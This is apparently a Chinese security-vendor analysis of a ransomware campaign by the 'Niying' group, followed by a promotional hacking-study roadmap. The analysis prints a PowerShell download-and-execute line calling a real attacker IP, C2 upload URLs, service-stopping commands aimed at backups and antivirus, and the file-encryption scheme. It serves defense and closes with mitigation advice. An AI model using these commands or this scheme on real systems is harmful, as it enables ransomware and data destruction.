“匿影”组织再次活跃——通过爆破数据库发起勒索攻击
事件概述近期有客户反馈服务器文件被加密新华三攻防实验室立即响应。在排查过程中发现中毒主机上有大量MSSQL爆破日志及PowerShell运行日志。通过对日志及关联样本进行分析最终判定此次攻击为“匿影”组织所为。“匿影”组织于2019年3月份首次被披露从被披露的3年来该组织一直保持较高的活跃度变种也在持续升级。在早期活动中“匿影”使用永恒之蓝漏洞向受害者计算机植入挖矿病毒利用中毒主机资源挖取门罗币为主的加密数字货币。2020年4月份一场在全网大规模传播“WannaRen”勒索病毒事件引起广泛关注经溯源分析其幕后黑手正是“匿影”组织。12月份研究人员在“匿影”的攻击活动中发现了一个新的自称为CryptoJoker勒索模块索要赎金从“WannaRen”的0.05BTC涨至0.1BTC在随后的“匿影”攻击套件中还发现了文件窃密模块新的窃密模块主要对用户的虚拟货币钱包、密码等重要文件数据进行窃取。在国家对挖矿活动整治的背景下该组织成功拓展了勒索、窃密等能力。并且我们在之后的“匿影”组织攻击活动跟踪中发现多数事件均以勒索为目的表明该组织已经将重心从挖矿转向勒索攻击。匿影组织近年发起的主要攻击事件事件分析攻击流程新华三攻防实验室还原“匿影”完整勒索攻击过程样本分析初始入侵通过MSSQL扫描爆破获取中毒主机权限最终执行PowerShell指令下载cpu2.txt到本地执行解码为IEX((new-objectnet.webclient).downloadstring(‘http://185.198.166.202/cpu2.txt’))载荷下载cpu2.txt实际是powershell下载器下载各种文件至C:\Users\Public文件夹下下载完成后cpu2.txt会执行ms.exe。白加黑利用ms.exe主要负责执行lu.exe利用白加黑技术躲避杀软检测执行后续攻击。lu.exe是白文件原文件名Start.exeSandboxie相关包含有效证书。lu.exe会加载SbieDll.dll该dll为黑文件负责解密执行123.txt。勒索实施1、123.txt123.txt内容经过Base64编码解码后得到一个整型的宽字节数组。将该整数组转为bytes类型后得到一个未知类型文件经分析该文件由一段shellcode和一个恶意可执行PE文件“123_dump”组合构成。Shellcode用来解密出被混淆的API通过调用VirtualAllocVirtualProtect等API加载“123_dump”到新分配内存空间中执行。2、123_dump——解密执行shell.txt样本运行后首先会查找目录C:\users\public下是否有1949.txt该文件的存在是决定程序是否继续执行的标志但程序并未加载解析1949.txt的内容。进程提权程序会查询当前进程实现系统级别提权。解密shell.txt。程序会拼接当前程序目录C:\User\Public\shell.txt查找shell.txt,若文件存在则加载到申请的内存空间中。shell.txt本身是经过加密的文件无法直接执行。程序随即通过硬编码的解密算法字符串“RC4”和密钥“999888”作为参数传入sub_10001DFB函数中。经分析sub_10001DFB函数中不仅支持RC4算法解密还包括对RC2DES3DESAES192AES256以及对分组加密的五种模式CBCECBOFBCFBCTR进行解密。RC4解密完成后在新分配的内存空间中得到一个可执行PE文件。随后程序使用进程镂空方式将该恶意PE文件注入到系统程序servces.exe并执行。3、shell.txtshell.txt包含了11个子PE文件用以实现提权、终止进程、终止服务、加密文件的功能主要调用关系如下为方便描述将子PE文件命名为shell.txt.decrypted2.v~shell.txt.decrypted12.v具体分析见下文。1 shell.txt创建事件对象ezrxtcfyvgihuewawaeewekb判断是否有管理员权限取不同标识字符串管理员为“zzz”非管理员为“jjj”获取主机名、用户名、公网IP等信息与权限标识字符串拼接成一个字符串作为文件名称回传信息至hxxp://m.mssqlnewpro.com/mssqlzzz/upload.php然后创建cmd.exe或notepad.exe进程并注入恶意载荷shell.txt.decrypted.2.v实施勒索攻击。在非管理员权限下shell.txt释放C:\Users\Public\a.dll、C:\Users\Public\CVE20211675.exe、C:\Users\Public\MSFRottenPotato.exe等PE文件利用CVE-2021-1675、CVE-2021-1732、CVE-2022-21882等漏洞进行提权并重新执行lu.exe文件。2shell.txt.decrypted.2.v判断是否为管理员取不同标识字符串另外创建一个线程下载 hxxps://m.mssqlnewpro.com/admin.jpg 对其进行RC4解密key为999888然后通过进程注入执行。该解密方式和key与123.txt解密shell.txt一致。再次判断管理员权限如果是管理员则先删除之前下载的文件防止溯源分析部分如下然后依次注入执行 shell.txt.decrypted.3.v 、shell.txt.decrypted.4.v3shell.txt.decrypted.4.v——关闭进程和服务Microsoft Visual C/C(6.0 (1720-9782))[EXE32]创建事件对象 rsedtfyguhijoiy69ggjhhjggs464查找并关闭以下进程关闭以下服务通过命令行关闭大量数据库和数据备份相关服务及一些安全软件相关服务共183项NET stop MSSQL$SQLEXPRESS /YNET STOP acrsch2svc /YNET STOP acronisagent /YNET STOP arsm /YNET STOP FirebirdServerDefaultInstance /YNET STOP FirebirdGuardianDefaultInstance /YNET STOP MuzzleServer /Ysc stop “Acronis VSS Provider” /ysc stop “Enterprise Client Service” /ysc stop “Sophos Agent” /y……sc stop kavfsslp /ysc stop KAVFSGTsc stop KAVFS /ysc stop mfefire4shell.txt.decrypted.5.v——NTSD.exepdb path: ntsd.pdb是Windows自带的用户态调试工具可用于强制结束进程。5shell.txt.decrypted.3.v——执行加密操作判断是否为管理员是则创建事件对象 eyrwtyyweyetywetrey 不是则ewyrgrjhshasdftagdagere在以下字符中随机生成RC4和AES密钥密钥通过RSA公钥加密并base64编码保存删除卷影遍历各磁盘获取具有以下后缀的目标文件doc, docx, xls, dat, xlsx, ec, ppt, pptx, pst, ost, msg, eml, vsd,vsdx, txt, csv, rtf, 123, wks, wk1, pdf, dwg, onetoc2, snt, jpeg, jpg,docb, docm, dot, dotm, dotx, xlsm, xlsb, xlw, xlt, xlm, xlc, xltx,xltm, pptm, pot, pps, ppsm, ppsx, ppam, potx, potm, edb, hwp, 602,sxi, sti, sldx, sldm, vdi, vmdk, vmx, gpg, aes, ARC, PAQ, bz2, tbk,bak, tar, tgz, gz, 7z, rar, zip, backup, iso, vcd, bmp, png, gif, raw,cgm, tif, tiff, nef, psd, ai, svg, djvu, m4u, m3u, mid, wma, flv, 3g2,mkv, 3gp, mp4, mov, avi, asf, mpeg, vob, mpg, wmv, fla, swf, wav, mp3,sh, class, jar, java, rb, asp, php, jsp, brd, sch, dch, dip, pl, vb,vbs, ps1, bat, cmd, js, asm, h, pas, cpp, c, cs, suo, sln, ldf, mdf,ibd, myi, myd, frm, odb, dbf, db, mdb, accdb, sql, sqlitedb, sqlite3,asc, lay6, lay, mml, sxm, otg, odg, uop, std, sxd, otp, odp, wb2, slk,dif, stc, sxc, ots, ods, 3dm, max, 3ds, uot, stw, sxw, ott, odt, pem,p12, csr, crt, key, pfx, der排除包含以下字符串的文件路径加密逻辑当文件小于等于20000字节(约19KB)时使用RC4加密key为ksfdskjl81。当文件大于20000字节小于30000000字节(约19MB)时全部读取加密RC4加密全文件AES加密前20000字节(CBC不填充模式IV为0实际加密20016字节最后16字节为空)最后会附加16字节加密数据和684字节base64编码之后的RSA加密key。当文件大于等于30000000字节时只加密前30000000字节RC4加密前30000000字节AES加密前100000字节(CBC不填充模式IV为0实际加密100016字节最后16字节为空)后面保持原内容最后会附加16字节加密数据和684字节base64编码之后的RSA加密key。加密后缀为.locked被加密文件目录下会生成名为HOW_TO_DECRYPT.txt的勒索信。加密完成后会连接一次C2服务器回传相关信息和加密结果。“匿影”组织技术特点**入侵传播阶段“匿影”擅长在各大软件下载站、免费图床、网盘等公共基础网络上进行木马传播比如将伪装成BT下载器、激活工具程序的恶意代码上传至各大下载站。除此之外一些第三方公司网站也被“匿影”攻陷并充当木马下载服务器。另外“匿影”经常使用开源渗透工具Ladon对公网上的主机进行MS17-010漏洞利用、弱口令爆破等。载荷执行阶段该组织具有模块化开发的能力各组件分工明确。并且该组织注重躲避安全软件的检测其常用的免杀手段包括1无文件攻击。无论是在早期挖矿还是在后期勒索中当成功入侵到受害者主机后“匿影”惯用PowerShell来执行后续一系列攻击步骤包括其他恶意模块下载、加载执行、持久化等。2白加黑技术。利用白exe加载恶意dll来躲避安全软件检测该组织已使用过的白加黑利用手段有WINWODR.exe、Start.exe(Sandboxie)等。3加密混淆核心载荷。通过PowerShell脚本下载的载荷通常进行了加密混淆处理常使用Base64编码、逆序、字符类型转化、异或、RC4加密等。解密后的关键代码还会使用Themida壳或VMP壳进行保护最后再被命名为以.txt和.jpg为主的具有迷惑性的文件后缀。ATT CK分布图处置建议1、避免将重要服务映射至公网若业务需要请增加口令复杂度避免使用弱口令2、尽量通过官方下载渠道下载软件使用正版软件3、请及时更新系统补丁减少系统漏洞带来的风险4、重要文件请及时备份。最后网络安全需要学习那些知识网络安全零基础入门学习路线规划初级1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级黑客这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。网络安全工程师企业级学习路线视频配套资料国内外网安书籍、文档工具当然除了有配套的视频同时也为大家整理了各种文档和书籍资料工具并且已经帮大家分好类了。一些我自己买的、其他平台白嫖不到的视频教程要学习网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

相关新闻

Compose 组件 - 一些展示类型

Compose 组件 - 一些展示类型

也是组合函数,而不是以对象的形式提供。 一、文本 Text 查看官方介绍 Composable fun Text( text: String, modifier: Modifier Modifier, color: Color Color.Unspecified, autoSize: TextAutoSize? null, fontSize: TextUnit TextUnit…

2026/9/25 5:05:56 阅读更多 →
服务器端调用客户端硬件设备解决方案

服务器端调用客户端硬件设备解决方案

流程: 1、客户端使用java 开发 WebSocket服务,以实现调用设备端接口。 2、服务器端程序通过 WebSocket通讯调用客户端本地设备,实现具体操作。 举例:服务器端(为简单验证用,临时搭建) 源码下载地…

2026/9/25 5:05:56 阅读更多 →
HMIMaker轻量级组态上位机实战指南:产线可用的Modbus RTU/TC

HMIMaker轻量级组态上位机实战指南:产线可用的Modbus RTU/TC

简介:HMIMaker是一款面向工业自动化领域的轻量级上位机人机界面组态软件,专为易显科技VGA工控机与工控板设计,解决工程师在HMI界面开发中代码编写复杂、调试周期长、跨设备适配难等痛点,适用于PLC/单片机系统集成、产线监控面板快…

2026/9/25 5:05:56 阅读更多 →

最新新闻

使用 Sinon 对 ES Module 导入进行 Stub:esm 包与 mutableNamespace 完整实战指南

使用 Sinon 对 ES Module 导入进行 Stub:esm 包与 mutableNamespace 完整实战指南

测试开发工具 【免费下载链接】sinon Test spies, stubs and mocks for JavaScript. 项目地址: https://gitcode.com/gh_mirrors/si/sinon 点击查看 免费下载 ES Modules(ESM)的绑定是**静态解析、实时(live)且不可变…

2026/9/25 5:41:31 阅读更多 →
RT-Thread 在 QEMU VExpress-A9 上的运行指南:BSP 编译、启动脚本、SD 卡文件系统与调试全解析

RT-Thread 在 QEMU VExpress-A9 上的运行指南:BSP 编译、启动脚本、SD 卡文件系统与调试全解析

操作系统嵌入式物联网嵌入式OSRTOS 【免费下载链接】rt-thread RT-Thread is an open source IoT Real-Time Operating System (RTOS). https://rt-thread.github.io/rt-thread/ 项目地址: https://gitcode.com/gh_mirrors/rt/rt-thread 点击查看 免费下载 本文围绕…

2026/9/25 5:41:31 阅读更多 →
GoogleTest Matchers 完全参考:用 gperftools 项目中的 gmocking 匹配器写出可读、可复用的断言

GoogleTest Matchers 完全参考:用 gperftools 项目中的 gmocking 匹配器写出可读、可复用的断言

性能剖析内存管理开发工具 【免费下载链接】gperftools Main gperftools repository 项目地址: https://gitcode.com/gh_mirrors/gp/gperftools 点击查看 免费下载 Matchers(匹配器)是 GoogleTest / GoogleMock 中用于校验单个参数的利器&am…

2026/9/25 5:41:31 阅读更多 →
jc --needrestart:把 needrestart -b 的开机重启建议输出转换为 JSON/YAML 的解析器

jc --needrestart:把 needrestart -b 的开机重启建议输出转换为 JSON/YAML 的解析器

开发工具 【免费下载链接】jc CLI tool and python library that converts the output of popular command-line tools, file-types, and common strings to JSON, YAML, or Dictionaries. This allows piping of output to tools like jq and simplifying automation scripts.…

2026/9/25 5:41:31 阅读更多 →
AMD官网下载Vivado遇合规性失败?全流程排查与解决指南

AMD官网下载Vivado遇合规性失败?全流程排查与解决指南

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/25 5:41:31 阅读更多 →
Atlas 300V 24G跑YOLO全流程:从环境搭建到推理优化

Atlas 300V 24G跑YOLO全流程:从环境搭建到推理优化

干了这么多年AI部署,说实话被各种推理卡折磨过不少回,Atlas 300V 24G 这张卡算是让我印象比较深的一张。一开始单纯以为它就是一张普通的 PCIe 加速卡,结果从驱动到算子适配到模型转换,每一步都有它自己的脾气。这篇文章就围绕 At…

2026/9/25 5:40:31 阅读更多 →

日新闻

AI元人文:从工具使用到思维重构的深度探索

AI元人文:从工具使用到思维重构的深度探索

最近半年我一直在琢磨一件事:AI元人文到底是什么?说白了,就是“用元视角重新审视人与AI的关系”,也在“探索AI如何反向逼着我们发现自己的思考边界”。标题里的“元探索”,在我看就是一层套一层的追问——当你用AI解决…

2026/9/25 0:00:41 阅读更多 →
Python+CNN车牌识别实战:从数据预处理到模型训练与部署

Python+CNN车牌识别实战:从数据预处理到模型训练与部署

简介:基于Python与卷积神经网络的车牌识别项目,面向计算机视觉初学者及智能交通开发者,目标是帮助用户掌握从数据预处理、模型构建到实际部署的完整流程。压缩包共25个文件,包含jpg/png图像样本、py训练脚本、md说明文档、dat数据…

2026/9/25 0:00:41 阅读更多 →
Vim基础操作全攻略:保存退出、模式切换与高频命令实战

Vim基础操作全攻略:保存退出、模式切换与高频命令实战

1. 项目概述1.1 核心需求解析今天聊聊Vim。写这个题目的原因是:几乎每个后端开发者、运维人员、数据工程师某天都会遇到一个场景——深夜加班,服务器登录界面只有黑底白字,编辑器只有vi/vim,你必须在五分钟内完成一次配置修改并保…

2026/9/25 0:00:41 阅读更多 →

周新闻

Flutter for OpenHarmony游戏卡片渐变背景实战:从原理到性能优化

Flutter for OpenHarmony游戏卡片渐变背景实战:从原理到性能优化

直接铺开项目本身吧。这几个月我一直在折腾一件事:用Flutter给OpenHarmony做一款游戏集合类的App,说白了就是把若干小游戏塞进一个壳里,用统一入口分发。这个方向本身不算新鲜,真正让我花了不少心思的,是首页那堆游戏卡…

2026/9/24 14:34:13 阅读更多 →
Word表格编号全攻略:从列表编号到题注交叉引用

Word表格编号全攻略:从列表编号到题注交叉引用

写Word文档,最让人头疼的往往是那些“看起来不起眼”的小问题。比如表格编号这事:今天在表后面多加了两个空白行,明天给客户交稿前发现整个章节的编号全部错位,光是挨个改序号就能耗掉大半个下午。我前阵子帮人整理一份上百页的技…

2026/9/24 9:10:42 阅读更多 →
从第一个站到第二个站:独立开发者的静态网站选型与落地实践

从第一个站到第二个站:独立开发者的静态网站选型与落地实践

1. 项目概述1.1 核心需求解析做独立开发者这几年,说实话,第一个网站上线的那天晚上我兴奋得没睡着。但等它跑了半年,流量惨淡、功能臃肿、代码自己都懒得看第二遍之后,我才慢慢琢磨明白一个道理:第一个网站是练手&…

2026/9/24 14:33:56 阅读更多 →

月新闻

持续集成 流水线自动化与 声明式交付 实践:原型怎样变成可用功能

持续集成 流水线自动化与 声明式交付 实践:原型怎样变成可用功能

持续集成 流水线自动化与 声明式交付 实践:原型怎样变成可用功能分类:[AI/大模型]细分主题:AI 增强型 CI/CD 流水线自动化与 GitOps 实践:Agent 工作流、工具调用与任务拆解:从原型到生产的验收清单很多团队在尝试用大…

2026/9/24 12:50:34 阅读更多 →
容器编排 生产环境运维与排障实战:复盘记录怎样真正派上用场

容器编排 生产环境运维与排障实战:复盘记录怎样真正派上用场

容器编排 生产环境运维与排障实战:复盘记录怎样真正派上用场分类:[工程技术]细分主题:Kubernetes 生产环境运维与排障实战:可复制的项目复盘模板与决策记录大部分团队的事故复盘报告,最后都变成了躺在 Confluence 或钉…

2026/9/24 14:33:48 阅读更多 →
容器 容器化技术与镜像安全管理:核心链路应该先拆哪一步

容器 容器化技术与镜像安全管理:核心链路应该先拆哪一步

容器 容器化技术与镜像安全管理:核心链路应该先拆哪一步分类:[工程技术]细分主题:Docker 容器化技术与镜像安全管理:核心链路的逐步实现与关键代码取舍面对一个积累了五六年历史包袱的单体架构应用(包含 Web 接口、后台…

2026/9/24 12:49:17 阅读更多 →